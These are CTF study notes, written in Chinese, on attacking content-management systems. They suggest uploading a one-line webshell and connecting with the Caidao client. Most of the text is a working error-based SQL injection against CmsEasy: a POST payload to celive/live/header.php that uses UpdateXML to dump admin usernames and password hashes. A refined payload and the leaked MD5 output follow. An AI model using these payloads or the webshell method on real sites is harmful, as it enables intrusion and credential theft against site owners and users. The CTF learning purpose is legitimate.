CMS类型题目:
首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入;
或者上传一句话木马后使用菜刀连接,可能再连接数据库。
(1)CMSEASY类型
可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy
1.cmseasy 无限制报错注入
步骤:向http://*****/celive/live/header.php中添加POST参数,如下:
xajax=Postdata&xajaxargs[0]=detail=xxxxxx’,(UpdateXML(1,CONCAT(0x5b,substring((SELECT/
/GROUP_CONCAT(username,password) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--
结果:可以爆出用户名及密码(md5加密)
例:XPATH syntax error: ‘[adminff512d4240cbbdeafada404677’
改进:XPATH显示的位数可能不够,所以改进POST参数,如下:
xajax=Postdata&xajaxargs[0]=detail=xxxxxx’,(UpdateXML(1,CONCAT(0x5b,substring((SELECT/
/GROUP_CONCAT(username,password)+from+yesercms_user),7,39),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)–+
解释:可见之前是1-32位,现在是7-39位,用户名是admin,该错误还会有一位’['占位,则密码的md5应该是6-39
第一次:XPATH syntax error: ‘[adminff512d4240cbbdeafada404677’
第二次:XPATH syntax error: ‘[f512d4240cbbdeafada404677ccbe61’
所以密码md5为:ff512d4240cbbdeafada404677ccbe61
(2)齐博CMS类型
可用公开漏洞网站:https://www.2cto.com/article/201501/365742.html